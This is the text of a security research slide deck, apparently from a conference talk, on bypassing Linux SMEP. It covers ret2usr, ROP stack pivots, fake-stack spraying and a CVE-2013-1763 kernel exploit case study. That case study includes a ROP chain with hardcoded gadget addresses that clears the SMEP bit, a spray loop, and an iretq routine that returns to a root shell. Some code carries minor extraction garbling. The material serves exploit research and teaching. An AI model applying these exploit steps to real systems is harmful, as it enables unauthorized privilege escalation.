Linux SMEP bypass techniques

Practical SMEP bypass
techniques on Linux
Vitaly Nikolenko
@vnik5287
vnik@cyseclabs.com

Who am I?
• Vitaly - @vnik5287
• Security researcher
• Kernel exploit development
• Kernel hardening techniques

Agenda
• Introduction (ret2usr)
• SMEP bypass
• SMEP, ROP, Spraying
• CVE-2013-1763 (case study)

ret2usr
• Linux - kernel space on behalf of user space
model
• User space processes cannot access kernel
space
• Kernel space can access user space
• ret2usr - redirect corrupted code or data ptr to
code or data in user space

ret2usr
• Memory split
• 0 to TASK_SIZE for user-
space processes
• 47 bits minus one guard
page = 0x7FFFFFFFF000
• Corrupted function or data
struct pointer
• Redirect control ﬂow to
escalate_privs() in usespace
Function ptr
Data struct ptr
((1UL << 47) - PAGE_SIZE)
escalate_privs()
Data struct
High mem addr
Low mem addr
Kernel space
User space

ret2usr
Option #1 - corrupted function ptr
• Find a function pointer to overwrite
• mmap privilege escalation payload in user space:
int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
commit_creds = 0xffffffffxxxxxxxx;
prepare_kernel_cred = 0xffffffffxxxxxxxx;
void escalate_privs() { commit_creds(prepare_kernel_cred(0)); }
• Trigger the function

ret2usr
Privilege escalation
• struct cred - basic unit of “credentials”
• prepare_kernel_cred - allocates and returns a
new struct cred
• commit_creds - applies the new credentials

ret2usr
Function ptr
escalate_privs()
High mem addr
Low mem addr
Kernel space
User space

ret2usr
• What function pointer to overwrite?
• ptmx_fops
• int fd = open("/dev/ptmx", O_RDWR);
• fsync(fd);
• perf_fops
• int fd = sys_perf_event_open(…);
• fsync(fd);
• grep -E ‘_ops$|_fops$’ /boot/System.map*

ret2usr
Option #2 - corrupted data struct ptr
• Create a fake data structure “A” in user space
• Overwrite the function ptr “A.ptr” with priv esc
code (also in user space)
• Trigger the function

ret2usr
Option #2 - corrupted data struct ptr
struct vuln_ops
*dptr;
struct vuln_ops {
void (*a)();
int b;
…
};
High mem addr
Low mem addr
Kernel space
User space
escalate_privs()

ret2usr
• When escalate_privs() completes:
• retq (stack is not modiﬁed)
• system(‘/bin/sh’) —> #
• clean exit

SMEP
• Supervisor Mode Execution Protection
“The processor introduces a new mechanism that
provides next level of system protection by
blocking malicious software attacks from user
mode code when the system is running in the
highest privilege level.“ - 3rd Gen Intel Core
(Datasheet, Volume 1)

SMEP
• Bit 20 (CR4 register) is set 1
• CR4 register value 0x1407f0 = 0001 0100 0000 0111 1111 0000
Intel® 64 and IA-32 Architectures
Software Developer’s Manual Vol 3

SMEP
• If CR4.SMEP = 1, instructions may not be
fetched from any user-mode address.
(according to Intel)
• CR4 register can be modiﬁed using standard
MOV instructions
• Clear the SMEP bit: mov $0x1407e0, %cr4

SMEP
• Check if SMEP is enabled:
• cat /proc/cpuinfo | grep smep # (no root required)
• Disable SMEP (“nosmep” kernel parameter)
• Hypervisors
• Xen, VMWare - SMEP support
• VirtualBox, Hyper-V - no SMEP support
• VMWare - virtualHW.version “8” or below - no SMEP support

AWS SMEP
instance created Jun/Jul 2014

AWS SMEP
instance created Jan 2015

ROPing
• vmlinux vs vmlinuz?
• Kernel debugging RPM, DEB, etc.
• https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux
• ./extract-vmlinux /boot/vmlinuz-… > elf.bin
• Finding gadgets
• objdump -d ./vmlinux (aligned addresses only)
• ROPgadget http://shell-storm.org/project/ROPgadget/
• ./ROPgadget.py --binary ./vmlinux > rop.txt # Intel syntax

ROPing
IA32 language density
• Almost any sequence of bytes can be
interpreted as an instruction
0f 94 c3; sete %bl

ROPing
IA32 language density
• Almost any sequence of bytes can be
interpreted as an instruction
0f 94 c3; sete %bl
94 c3; xchg eax, esp; ret

Stack Pivots
• mov %rsp, %rXx ; ret
• add %rsp, … ; ret
• xchg %rXx, %rsp ; ret
• xchg %eXx, %esp ; ret (on a 64-bit system)
• will land in user-mode memory
• rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef

Stack pivot - NX address
Exploit attempt? Why yes it is…

SMEP Bypass
struct vuln_ops
*dptr;
struct vuln_ops {
void (*a)();
int b;
…
};
High mem addr
Low mem addr
Kernel space
User space
escalate_privs()
stack pivot
FAKE STACK
ROP PAYLOAD

SMEP Bypass
• FAKE STACK payload
• Option #1: disable SMEP and execute
escalate_privs() in user space
• Option #2: disable SMEP and execute
commit_creds(prepare_kernel_cred(0)) using
ROP

SMEP Bypass
Option #1
POP XXX; RET
High mem addr
Low mem addr
CR4_VALUE ^
0xFFFFF
MOV XXX, CR4; RET
ESCALATE_PRIVS()
in userspace

CR4 register
• How to get the value of the CR4 register?
• Option #1 - hardcoded (0x1407f0)
• gdb - no support
• Look at kernel oops
• Option #2 - ROP chain
MOV %CR4, %REGISTER
XOR %REGISTER, $0xFFFFF
MOV %REGISTER, %CR4

Fake stack
• xchg %eax, %esp; ret
• rax = 0xffffffffdeadbeef; rsp <— 0xdeadbeef
• Prepare fake stack at 0xdeadbeef in
userspace

Fake stack
• What if we don’t control %rax or %eax when
pivoting?
• %rax <— random value
• Allocate ~4GB - mmap_min_addr to
0xFFFFFFFF and spray it with our ROP
payload

Fake stack
Spraying
ROP INSTR 1
0xFFFFFFFF
0x10000
ROP INSTR 2
ROP INSTR 3
…
ROP INSTR 1
ROP INSTR 2
ROP INSTR 3
…

Fake stack
Spraying
• May land in the middle of our ROP payload
• Will likely page fault!
• An alternative is to spray the stack with an %rsp-
advancing gadget:
• pop %xxx; ret
• nop; ret

Fake stack
Spraying
POP RAX; RET
0xFFFFFFFF
0x10000
POP RAX; RET
POP RAX; RET
…
POP RAX; RET
ROP INSTR 1
ROP INSTR 2
ROP INSTR 3
…

Target
• Ubuntu 12.04.02
> uname -a
Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP
Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64
GNU/Linux
• Ivy Bridge+

CVE-2013-1763
SOCK_DIAG
• Affected kernel versions: 3.3 - 3.8
• Trivial out bounds array access
• Public exploit code available (32 bit?)

CVE-2013-1763
SOCK_DIAG
sock_diag_handl
ers[45]
struct
sock_diag_handler
{
__u8 family;
int (*dump)(void *a,
void *b);
};
High mem addr
Low mem addr
Kernel space
User space
0x1ad38

CVE-2013-1763
SOCK_DIAG
sock_diag_handl
ers[45]
struct
sock_diag_handler
{
__u8 family;
void *b);
};
High mem addr
Low mem addr
Kernel space
User space
0x1ad38
xchg %eax, %ebp
ret
0xffffffff81ad2c32

CVE-2013-1763
SOCK_DIAG
sock_diag_handl
ers[45]
FAKE STACK
High mem addr
Low mem addr
Kernel space
User space
0x1ad38
xchg %eax, %ebp
ret
0xffffffff81ad2c32
struct
sock_diag_handler
{
__u8 family;
void *b);
};
0x35000000
0x45000000

CVE-2013-1763
SOCK_DIAG
• Map the fakestack area in user-space:
• 0x35000000 - 0x45000000
• fakestack = mmap((void*)0x35000000, 0x10000000, 7|
PROT_EXEC|PROT_READ|PROT_WRITE, 0x32, 0, 0))
• Spray the fakestack with:
• pop rax; ret
for (int p = 0; p < 0x10000000/sizeof(void*); p++)
*fakestack ++= 0xffffffff8100ad9eUL; // pop rax; ret

CVE-2013-1763
SOCK_DIAG
ptr = (unsigned long *)(fakestack + 0x10000000 - 0x1000);
*fakestack ++= 0xffffffff8133dc8fUL; // pop rdi; ret
*fakestack ++= 0x407e0; // CLEAR SMEP BIT
*fakestack ++= 0xffffffff810032edUL; // mov cr4, rdi; pop rbp; ret
*fakestack ++= 0xdeadbeef; // dummy placeholder
*fakestack ++= (unsigned long)kernel_code; // transfer control to
our usual shellcode

CVE-2013-1763
SOCK_DIAG
• What about the stack ptr?
• iret it!
static void saveme() {
asm(
"movq %%cs, %0n"
"movq %%ss, %1n"
"pushfqn"
"popq %2n"
: "=r" (user_cs), "=r" (user_ss),
"=r" (user_rflags) : : "memory");
}

CVE-2013-1763
SOCK_DIAG
static void restore() {
asm volatile(
"swapgs ;"
"movq %0, 0x20(%%rsp)tn"
"iretq"
: : "r" (user_ss),
"r" ((unsigned long)0x36000000),
"r" (user_rflags),
"r" (user_cs),
"r" (shell)
);
}

Linux SMEP bypass techniques

More Related Content

What's hot (20)

Similar to Linux SMEP bypass techniques (20)

Recently uploaded (20)

Linux SMEP bypass techniques